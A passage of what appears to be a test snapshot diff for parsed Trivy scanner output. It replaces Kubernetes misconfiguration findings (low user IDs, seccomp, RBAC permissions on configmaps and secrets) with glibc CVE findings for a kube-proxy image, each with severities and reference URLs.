"https://security.gentoo.org/glsa/202101-20", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + }, + { + "type": "URL", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsUser' > 10000)", + "category": "Vulnerability", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'lurker' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ConfigMap/extension-apiserver-authentication' / Class: 'config' / Type: 'kubernetes'", - "id": "AVD-KSV-0110", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://avd.aquasec.com/misconfig/avd-ksv-0110", - ], - }, - "category": "Misconfiguration", - "description": "Storing sensitive content such as usernames and email addresses in configMaps is unsafe", - "location": "scb://trivy/?Namespace=kube-system&Kind=ConfigMap&Name=extension-apiserver-authentication", - "mitigation": "Remove sensitive content from configMap data value", - "name": "ConfigMap with sensitive content(ConfigMap 'extension-apiserver-authentication' in 'kube-system' namespace stores sensitive contents in key(s) or value(s) '{"requestheader-username-headers"}')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/avd-ksv-0110", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-public&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:bootstrap-signer' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-controller-manager", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-controller-manager' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202107-07", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system::leader-locking-kube-scheduler' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system::leader-locking-kube-scheduler", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system::leader-locking-kube-scheduler' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:cloud-provider' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", - ], - }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:cloud-provider", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'system:controller:cloud-provider' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:bootstrap-signer' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:bootstrap-signer", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/leader-election-role' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV049", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv049", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, - "category": "Misconfiguration", - "description": "Some workloads leverage configmaps to store sensitive data or configuration parameters that affect runtime behavior that can be modified by an attacker or combined with another issue to potentially lead to compromise.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Role&Name=leader-election-role", - "mitigation": "Remove write permission verbs for resource 'configmaps'", - "name": "Do not allow management of configmaps(Role 'leader-election-role' should not have access to resource 'configmaps' for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", + "category": "Vulnerability", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv049", + "value": "https://avd.aquasec.com/nvd/cve-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Role/system:controller:token-cleaner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Namespace=kube-system&Kind=Role&Name=system:controller:token-cleaner", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://access.redhat.com/security/cve/CVE-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV044", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv044", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits wildcard verb on wildcard resource", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit wildcard verb on wildcard resource", - "name": "No wildcard verb and resource roles(Role permits wildcard verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv044", + "value": "https://linux.oracle.com/cve/CVE-2020-10029.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://linux.oracle.com/errata/ELSA-2021-0348.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/cluster-admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=cluster-admin", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV041", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv041", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits managing secrets", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit to manage secrets if not needed", - "name": "Do not allow management of secrets(Role permits management of secret(s))", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv041", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://security.gentoo.org/glsa/202006-04", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://security.netapp.com/advisory/ntap-20200327-0003/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/admin' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", - ], - }, - "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=admin", - "mitigation": "Create a role which does not permit update/create of a malicious 